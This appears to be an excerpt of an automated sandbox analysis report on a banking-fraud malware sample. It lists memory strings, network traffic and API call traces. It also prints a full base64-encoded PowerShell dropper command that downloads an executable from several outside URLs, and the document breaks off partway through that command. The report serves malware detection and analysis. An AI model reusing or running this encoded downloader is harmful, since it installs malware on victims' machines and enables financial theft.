Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://wus2-000.pagecontentsync.
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://www.odwebp.svc.ms
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: C:\Users\user\849.exe | Code function: 4_2_0041E3E9 GetKeyState,GetKeyState,GetKeyState,GetKeyState,4_2_0041E3E9
Source: C:\Users\user\849.exe | Code function: 4_2_00450B9A __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,4_2_00450B9A
Source: C:\Users\user\849.exe | Code function: 4_2_00424D66 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,4_2_00424D66
Source: C:\Users\user\849.exe | Code function: 4_2_0044716C ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,4_2_0044716C
Source: C:\Users\user\849.exe | Code function: 4_2_00447984 GetKeyState,GetKeyState,GetKeyState,4_2_00447984
Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exe | Code function: 5_2_0041E3E9 GetKeyState,GetKeyState,GetKeyState,GetKeyState,5_2_0041E3E9
Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exe | Code function: 5_2_00450B9A __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,5_2_00450B9A
Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exe | Code function: 5_2_00424D66 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,5_2_00424D66
Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exe | Code function: 5_2_0044716C ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,5_2_0044716C
Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exe | Code function: 5_2_00447984 GetKeyState,GetKeyState,GetKeyState,5_2_00447984

E-Banking Fraud:

Malicious encrypted Powershell command line found
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABaAEMAUQBEAFgAeABwAGIAPQAnAFoAWABHAE0ASwBjAHgAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAGAAUgBgAGkAVAB5AHAAcgBPAFQAYABPAEMATwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQATwBJAEcARwBJAGIAdABwACAAPQAgACcAOAA0ADkAJwA7ACQAQQBZAEsAUABVAGkAbABxAD0AJwBZAEgARgBOAEsAYwBjAG8AJwA7ACQAVwBGAEIATgBTAHMAdgBzAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAEkARwBHAEkAYgB0AHAAKwAnAC4AZQB4AGUAJwA7ACQAUwBIAEUAWQBRAHAAdgB1AD0AJwBDAFgARQBKAFcAZQBkAHAAJwA7ACQARgBHAFYATQBUAGgAaQBiAD0AJgAoACcAbgBlAHcALQBvACcAKwAnAGIAagBlAGMAJwArACcAdAAnACkAIABOAGUAdAAuAFcARQBCAEMATABpAEUATgBUADsAJABOAFEAQwBLAE0AdwBhAHkAPQAnAGgAdAB0AHAAOgAvAC8AbgB3AGMAcwB2AGMAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHUAegA2AF8AcQBzADgAXwBxAHIALwAqAGgAdAB0AHAAOgAvAC8AbwBkAGUAcwBzAGEAcgBlAHMAbwB1AHIAYwBlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwAzAF8AbwBfAGIAdQB0ADkALwAqAGgAdAB0AHAAcwA6AC8ALwBvAG4AZQBmAGEAcgBtAGQAZQBzAGkAZwBuAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AdQBfAGYAaQBnAF8AbQAyAG0AdgAvACoAaAB0AHQAcAA6AC8ALwBvAG4AZQB3AGkAdABoAHkAbwB1AGMAZAAuAGMAbwBtAC8AXwBtAG0ALwBvAGkAeABfAGsAdABjAHAAYwBfAGQAbABqAGgAcwBlAHgALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBwAGkAZQBtAG8AbgB0AGUAaQB0AGkAbgBlAHIAYQAuAG4AZQB0AC8AbgBfAGcAMgBvADQAXwBqAHUAbQBrAHQANAAvACcALgAiAHMAYABwAEwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUABOAFcAVgBMAGcAaABjAD0AJwBUAEsAVgBLAEgAbwBkAHQAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAUABIAEgAWgBpAGMAcgAgAGkAbgAgACQATg